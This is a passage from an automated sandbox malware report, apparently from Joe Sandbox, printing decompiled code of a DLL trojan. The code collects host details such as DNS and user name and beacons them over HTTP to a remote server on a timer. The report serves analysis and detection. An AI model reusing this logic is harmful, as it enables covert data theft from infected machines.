						_t8 = _t93 + 0x45eb676; // 0x732526
						_t96 = wsprintfA(_t114 + _t98, _t8, _a12);
						_t122 = _t122 + 0xc;
						_t114 = _t114 + _t96;
					}
					_t45 =  *0x45ea348; // 0xa0d5a8
					_t10 = _t45 + 0x45eb2de; // 0x74636126
					_t48 = wsprintfA(_t114 + _t98, _t10, 0);
					_t123 = _t122 + 0xc;
					_t115 = _t114 + _t48; // executed
					_t49 = E045E3DE0(_t99); // executed
					_t105 = _t49;
					if(_t105 != 0) {
						_t88 =  *0x45ea348; // 0xa0d5a8
						_t12 = _t88 + 0x45eb8c2; // 0x736e6426
						_t91 = wsprintfA(_t115 + _t98, _t12, _t105);
						_t123 = _t123 + 0xc;
						_t115 = _t115 + _t91;
						HeapFree( *0x45ea2d8, 0, _t105);
					}
					_t106 = E045E3ACA();
					if(_t106 != 0) {
						_t83 =  *0x45ea348; // 0xa0d5a8
						_t14 = _t83 + 0x45eb8ca; // 0x6f687726
						_t86 = wsprintfA(_t115 + _t98, _t14, _t106);
						_t123 = _t123 + 0xc;
						_t115 = _t115 + _t86;
						HeapFree( *0x45ea2d8, 0, _t106);
					}
					_t107 =  *0x45ea3cc; // 0x4ff9600
					_a20 = E045E4B69(0x45ea00a, _t107 + 4);
					_t53 =  *0x45ea36c; // 0x4ff95b0
					_t109 = 0;
					if(_t53 != 0) {
						_t80 =  *0x45ea348; // 0xa0d5a8
						_t17 = _t80 + 0x45eb889; // 0x3d736f26
						wsprintfA(_t115 + _t98, _t17, _t53);
					}
					if(_a20 != _t109) {
						_t116 = RtlAllocateHeap( *0x45ea2d8, _t109, 0x800);
						if(_t116 != _t109) {
							E045E53AE(GetTickCount());
							_t59 =  *0x45ea3cc; // 0x4ff9600
							__imp__(_t59 + 0x40);
							asm("lock xadd [eax], ecx");
							_t63 =  *0x45ea3cc; // 0x4ff9600
							__imp__(_t63 + 0x40);
							_t65 =  *0x45ea3cc; // 0x4ff9600
							_t66 = E045E2281(1, _t103, _t98,  *_t65); // executed
							_t119 = _t66;
							asm("lock xadd [eax], ecx");
							if(_t119 != _t109) {
								StrTrimA(_t119, 0x45e9280);
								_push(_t119);
								_t71 = E045E6311();
								_v20 = _t71;
								if(_t71 != _t109) {
									_t110 = __imp__;
									 *_t110(_t119, _v8);
									 *_t110(_t116, _v8);
									_t111 = __imp__;
									 *_t111(_t116, _v32);
									 *_t111(_t116, _t119);
									_t77 = E045E5D05(0xffffffffffffffff, _t116, _v28, _v24); // executed
									_v56 = _t77;
									if(_t77 != 0 && _t77 != 0x10d2) {
										E045E14C6();
									}
									HeapFree( *0x45ea2d8, 0, _v48);
									_t109 = 0;
								}
								HeapFree( *0x45ea2d8, _t109, _t119);
							}
							RtlFreeHeap( *0x45ea2d8, _t109, _t116); // executed
						}
						HeapFree( *0x45ea2d8, _t109, _a12);
					}
					RtlFreeHeap( *0x45ea2d8, _t109, _t98); // executed
				}
				return _v16;
			}

0x045e3643
0x045e3643
0x045e3643
0x045e3658
0x045e365a
0x045e365f
0x045e3663
0x045e366b
0x045e3671
0x045e3675
0x045e367d
0x045e3685
0x045e3685
0x045e3687
0x045e3693
0x045e36a2
0x045e36a7
0x045e36aa
0x045e36af
0x045e36b2
0x045e36b7
0x045e36ba
0x045e36c6
0x045e36d3
0x045e36d5
0x045e36db
0x045e36e0
0x045e36eb
0x045e36ed
0x045e36f0
0x045e36f6
0x045e36f8
0x045e3701
0x045e370c
0x045e370e
0x045e3711
0x045e3711
0x045e3713
0x045e3718
0x045e3724
0x045e3726
0x045e3729
0x045e372b
0x045e3730
0x045e3734
0x045e3736
0x045e373b
0x045e3747
0x045e3749
0x045e3755
0x045e3757
0x045e3757
0x045e3762
0x045e3766
0x045e3768
0x045e376d
0x045e3779
0x045e377b
0x045e3787
0x045e3789
0x045e3789
0x045e378f
0x045e37a2
0x045e37a6
0x045e37ab
0x045e37af
0x045e37b2
0x045e37b7
0x045e37c1
0x045e37c3
0x045e37ca
0x045e37e2
0x045e37e6
0x045e37f2
0x045e37f7
0x045e3800
0x045e3811
0x045e3815
0x045e381e
0x045e3824
0x045e382c
0x045e3831
0x045e383e
0x045e3844
0x045e3850
0x045e3856
0x045e3857
0x045e385c
0x045e3862
0x045e3868
0x045e386f
0x045e3876
0x045e387c
0x045e3883
0x045e3887
0x045e3892
0x045e3897
0x045e389d
0x045e38a6
0x045e38a6
0x045e38b7
0x045e38bd
0x045e38bd
0x045e38c7
0x045e38c7
0x045e38d5
0x045e38d5
0x045e38e6
0x045e38e6
0x045e38f4
0x045e38f4
0x045e3905

APIs

RtlAllocateHeap.NTDLL ref: 045E366B
GetTickCount.KERNEL32 ref: 045E367F
wsprintfA.USER32 ref: 045E36CE
wsprintfA.USER32 ref: 045E36EB
wsprintfA.USER32 ref: 045E370C
wsprintfA.USER32 ref: 045E3724
wsprintfA.USER32 ref: 045E3747
HeapFree.KERNEL32(00000000,00000000), ref: 045E3757
wsprintfA.USER32 ref: 045E3779
HeapFree.KERNEL32(00000000,00000000), ref: 045E3789
wsprintfA.USER32 ref: 045E37C1
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 045E37DC
GetTickCount.KERNEL32 ref: 045E37EC
RtlEnterCriticalSection.NTDLL(04FF95C0), ref: 045E3800
RtlLeaveCriticalSection.NTDLL(04FF95C0), ref: 045E381E

Part of subcall function 045E2281: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,045E3831,00000000,04FF9600), ref: 045E22AC
Part of subcall function 045E2281: lstrlen.KERNEL32(00000000,?,775EC740,045E3831,00000000,04FF9600), ref: 045E22B4
Part of subcall function 045E2281: strcpy.NTDLL ref: 045E22CB
Part of subcall function 045E2281: lstrcat.KERNEL32(00000000,00000000), ref: 045E22D6
Part of subcall function 045E2281: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,045E3831,?,775EC740,045E3831,00000000,04FF9600), ref: 045E22F3

StrTrimA.SHLWAPI(00000000,045E9280,00000000,04FF9600), ref: 045E3850

Part of subcall function 045E6311: lstrlen.KERNEL32(04FF9BB8,00000000,00000000,00000000,045E385C,00000000), ref: 045E6321
Part of subcall function 045E6311: lstrlen.KERNEL32(?), ref: 045E6329
Part of subcall function 045E6311: lstrcpy.KERNEL32(00000000,04FF9BB8), ref: 045E633D
Part of subcall function 045E6311: lstrcat.KERNEL32(00000000,?), ref: 045E6348

lstrcpy.KERNEL32(00000000,?), ref: 045E386F
lstrcpy.KERNEL32(00000000,?), ref: 045E3876
lstrcat.KERNEL32(00000000,?), ref: 045E3883
lstrcat.KERNEL32(00000000,00000000), ref: 045E3887

Part of subcall function 045E5D05: WaitForSingleObject.KERNEL32(00000000,747581D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 045E5DB7

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 045E38B7
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 045E38C7
RtlFreeHeap.NTDLL(00000000,00000000,00000000,04FF9600), ref: 045E38D5
HeapFree.KERNEL32(00000000,?), ref: 045E38E6
RtlFreeHeap.NTDLL(00000000,00000000), ref: 045E38F4

Strings

Uqt, xrefs: 045E3757, 045E3789, 045E38B7, 045E38C7, 045E38D5, 045E38E6, 045E38F4

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$AllocateCountCriticalSectionTickTrim$EnterLeaveObjectSingleWaitstrcpy
String ID: Uqt
API String ID: 186568778-2320327147
Opcode ID: 13a05f524e6e6e807363e240a80227ed8588106e3f4dd545605061660daa3a1b
Instruction ID: ae004c18fcb90e54cc02d5a922747ca42553cc7145631ce1a8e8f533ddd109ec
Opcode Fuzzy Hash: 13a05f524e6e6e807363e240a80227ed8588106e3f4dd545605061660daa3a1b
Instruction Fuzzy Hash: 70718FB1500205AFD729AF77EC88E6B3BE8FB88710B150514F909DB211D63AED09FB65

Uniqueness

Uniqueness Score: -1.00%

Function 045E7B59 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 126
networkstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E045E7B59(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				int _t53;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E045E7A71(__eax + __eax + 1);
				if(_t56 != 0) {
					_t53 = InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0); // executed
					if(_t53 == 0) {
						E045E789E(_t56);
					} else {
						E045E789E( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E045E7AEE) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E045E2129( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x45ea348; // 0xa0d5a8
						_t15 = _t59 + 0x45eb73b; // 0x544547
						_v8 = 0x84404000;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}

0x045e7b59
0x045e7b59
0x045e7b64
0x045e7b6b
0x045e7b73
0x045e7b7d
0x045e7b83
0x045e7b8e
0x045e7b96
0x045e7ba6
0x045e7b98
0x045e7b9b
0x045e7ba0
0x045e7ba0
0x045e7b96
0x045e7bb6
0x045e7bbc
0x045e7bc1
0x045e7caa
0x00000000
0x045e7bdc
0x045e7bdf
0x045e7bf2
0x045e7bf8
0x045e7bfd
0x045e7c25
0x045e7c38
0x045e7c42
0x045e7c45
0x045e7c4b
0x045e7c50
0x00000000
0x00000000
0x045e7c54
0x045e7c60
0x045e7c71
0x045e7c73
0x045e7c84
0x045e7c84
0x045e7c94
0x00000000
0x045e7ca6
0x00000000
0x045e7ca6
0x00000000
0x00000000
0x00000000
0x045e7bfd

APIs

lstrlen.KERNEL32(?,00000008,74714D40), ref: 045E7B6B

Part of subcall function 045E7A71: RtlAllocateHeap.NTDLL(00000000,00000000,045E4DB1), ref: 045E7A7D

InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 045E7B8E
InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 045E7BB6
InternetSetStatusCallback.WININET(00000000,045E7AEE), ref: 045E7BCD
ResetEvent.KERNEL32(?), ref: 045E7BDF
InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 045E7BF2
GetLastError.KERNEL32 ref: 045E7BFF
HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 045E7C45
InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 045E7C63
InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 045E7C84
InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 045E7C90
InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 045E7CA0
GetLastError.KERNEL32 ref: 045E7CAA

Part of subcall function 045E789E: RtlFreeHeap.NTDLL(00000000,00000000,045E4E3E,00000000,?,00000000,00000000), ref: 045E78AA

Strings

@MqtNqt, xrefs: 045E7BFF, 045E7CAA

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
String ID: @MqtNqt
API String ID: 2290446683-2883916605
Opcode ID: e58e56f47a76e3f2a0fd6fb25d2f34a9e12fa09dd09fe97c1031d80f732fac85
Instruction ID: 8216e58b067a934be45c75d2ba31fed1fbf11c314c17d41dfd73ca174a5058c3
Opcode Fuzzy Hash: e58e56f47a76e3f2a0fd6fb25d2f34a9e12fa09dd09fe97c1031d80f732fac85
Instruction Fuzzy Hash: EC418EB1900604BFD7399F77EC48E6B7BBDFB88701B104928F547E5190E735AA04EA20

Uniqueness

Uniqueness Score: -1.00%

Function 045E517A Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 151
timememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E045E517A(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				struct %anon52 _v124;
				long _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				struct %anon52 _t66;
				void* _t69;
				void* _t73;
				signed int _t74;
				void* _t76;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t76 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x45ea2e0);
					_v76 = 0;
					_v80 = 0;
					L045E82AA();
					_v84.LowPart = _t46;
					_v80 = _t76;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x45ea30c; // 0x2c0
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x45ea2ec = 5;
						} else {
							_t69 = E045E61FE(_t76); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x45ea300 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t74 = _v104.LowPart;
						_t58 = _t74 << 4;
						_t78 = _t89 + (_t74 << 4) + 0x38;
						_t75 = _t74 + 1;
						_v92.LowPart = _t74 + 1;
						_t61 = E045E64A2( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
						_v124 = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v92;
						_v104.LowPart = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v124.HighPart = E045E6821(_t75,  &_v72, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x45ea2e4);
							goto L21;
						} else {
							__eflags =  *0x45ea2e8; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E045E14C6();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x45ea2e8);
								L21:
								L045E82AA();
								_v104.LowPart = _t61;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t65;
								__eflags = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t73 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							HeapFree( *0x45ea2d8, 0, _t54);
						}
						_t82 =  &(_t82[4]);
						_t73 = _t73 - 1;
					} while (_t73 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}

0x045e517a
0x045e5190
0x045e5194
0x045e5199
0x045e51a0
0x045e51a6
0x045e51ac
0x045e5333
0x045e51b2
0x045e51b2
0x045e51b4
0x045e51b9
0x045e51ba
0x045e51c0
0x045e51c4
0x045e51c8
0x045e51d6
0x045e51e4
0x045e51e8
0x045e51ea
0x045e51f7
0x045e5203
0x045e5205
0x045e520b
0x045e5214
0x045e521f
0x045e521f
0x045e5216
0x045e5216
0x045e521d
0x00000000
0x00000000
0x045e521d
0x045e5229
0x00000000
0x045e522d
0x045e5232
0x045e523d
0x045e523d
0x045e5245
0x045e524b
0x045e5253
0x045e525c
0x045e5263
0x045e5267
0x045e526c
0x045e5272
0x00000000
0x00000000
0x045e5274
0x045e5278
0x045e527f
0x00000000
0x045e5281
0x045e5291
0x045e5291
0x00000000
0x045e52c2
0x045e52c2
0x045e52c7
0x045e52e6
0x045e52e8
0x045e52ed
0x045e52ee
0x00000000
0x045e52c9
0x045e52c9
0x045e52cf
0x00000000
0x045e52d1
0x045e52d1
0x045e52d6
0x045e52d8
0x045e52dd
0x045e52de
0x045e52f4
0x045e52f4
0x045e52fc
0x045e530a
0x045e530e
0x045e531a
0x045e531c
0x045e5320
0x045e5322
0x00000000
0x045e5328
0x00000000
0x045e5328
0x045e5322
0x045e52cf
0x00000000
0x045e52c7
0x045e5295
0x045e5297
0x045e529b
0x045e529c
0x045e529c
0x045e52a0
0x045e52aa
0x045e52aa
0x045e52b0
0x045e52b3
0x045e52b3
0x045e52ba
0x045e52ba
0x045e5341
0x00000000

APIs

memset.NTDLL ref: 045E5194
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 045E51A0
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 045E51C8
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 045E51E8
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,045E1273,?), ref: 045E5203
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,045E1273,?,00000000), ref: 045E52AA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,045E1273,?,00000000,?,?), ref: 045E52BA
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 045E52F4
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 045E530E
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 045E531A

Part of subcall function 045E61FE: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04FF93D8,00000000,?,7476F710,00000000,7476F730), ref: 045E624D
Part of subcall function 045E61FE: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04FF9410,?,00000000,30314549,00000014,004F0053,04FF93CC), ref: 045E62EA
Part of subcall function 045E61FE: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,045E521B), ref: 045E62FC

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,045E1273,?,00000000,?,?), ref: 045E532D

Strings

@MqtNqt, xrefs: 045E532D
Uqt, xrefs: 045E52AA

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID: Uqt$@MqtNqt
API String ID: 3521023985-3266969629
Opcode ID: 5036bc007705161a3e3f6971819f9f6c8d13eea398325c4ed2297f01f58e4c2d
Instruction ID: 8650c37c54223419c75f5956b66fbfe40e52173910b349672ad4e7dd514eeb1d
Opcode Fuzzy Hash: 5036bc007705161a3e3f6971819f9f6c8d13eea398325c4ed2297f01f58e4c2d
Instruction Fuzzy Hash: 335190B0508314BFD7159F62DC449AFBBE8FF89324F404A1AF4A496251E774A904EF92

Uniqueness

Uniqueness Score: -1.00%

Function 045E7F95 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 209
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E045E7F95(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x45e0000;
				_t115 = _t139[3] + 0x45e0000;
				_t131 = _t139[4] + 0x45e0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x45e0000;
				_v16 = _t139[5] + 0x45e0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x45e0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x45ea1c0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x45ea1c0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x45ea1c0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x45ea1bc; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x45ea1c0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x45ea1b8; // 0x0
										 *_t102 = _t125;
										 *0x45ea1b8 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x45ea1bc; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x045e7fa4
0x045e7fba
0x045e7fc0
0x045e7fc2
0x045e7fc7
0x045e7fcd
0x045e7fd2
0x045e7fd5
0x045e7fe3
0x045e7fea
0x045e7fed
0x045e7ff0
0x045e7ff1
0x045e7ff4
0x045e7ff7
0x045e7ffa
0x045e7fff
0x045e800e
0x00000000
0x045e8014
0x045e801e
0x045e8028
0x045e802d
0x045e802f
0x045e8039
0x045e803c
0x045e803f
0x045e8045
0x045e8047
0x045e8047
0x045e804a
0x045e804d
0x045e8052
0x045e8056
0x045e8069
0x045e806b
0x045e8113
0x045e8113
0x045e811a
0x045e811d
0x045e8127
0x045e8127
0x045e812b
0x045e81a9
0x045e81ac
0x045e81ae
0x045e81ae
0x045e81b5
0x045e81b7
0x045e81c1
0x045e81c4
0x045e81c7
0x045e81c7
0x00000000
0x045e812d
0x045e8130
0x045e815e
0x045e8168
0x045e816c
0x045e8174
0x045e8177
0x045e817e
0x045e8188
0x045e8188
0x045e818c
0x045e8191
0x045e81a0
0x045e81a6
0x045e81a6
0x045e818c
0x00000000
0x045e8137
0x045e813a
0x045e8142
0x045e8157
0x045e815c
0x00000000
0x00000000
0x045e815c
0x00000000
0x045e8142
0x045e8130
0x045e812b
0x045e8071
0x045e8078
0x045e8088
0x045e808b
0x045e8091
0x045e8095
0x045e80d8
0x045e80e4
0x045e810d
0x045e80e6
0x045e80ea
0x045e80f0
0x045e80f8
0x045e80fa
0x045e80fd
0x045e8103
0x045e8105
0x045e8105
0x045e80f8
0x045e80ea
0x00000000
0x045e80e4
0x045e809d
0x045e80a0
0x045e80a7
0x045e80b7
0x045e80ba
0x045e80ca
0x00000000
0x045e80d0
0x045e80b1
0x045e80b5
0x00000000
0x00000000
0x00000000
0x045e80b5
0x045e8082
0x045e8086
0x00000000
0x00000000
0x00000000
0x045e8086
0x045e805f
0x045e8063
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 045E800E
LoadLibraryA.KERNEL32(?), ref: 045E808B
GetLastError.KERNEL32 ref: 045E8097
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 045E80CA

Strings

$, xrefs: 045E7FE3
@MqtNqt, xrefs: 045E8097, 045E816E

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $$@MqtNqt
API String ID: 948315288-516465142
Opcode ID: 657b8e351d7594f5ba1c59ab71c0715aa7f0c393bb923b528614c7953fe453e7
Instruction ID: 741a546db1e7ce20abd2f9e7555dd81337a642d74e516c3b77f90941017fff2f
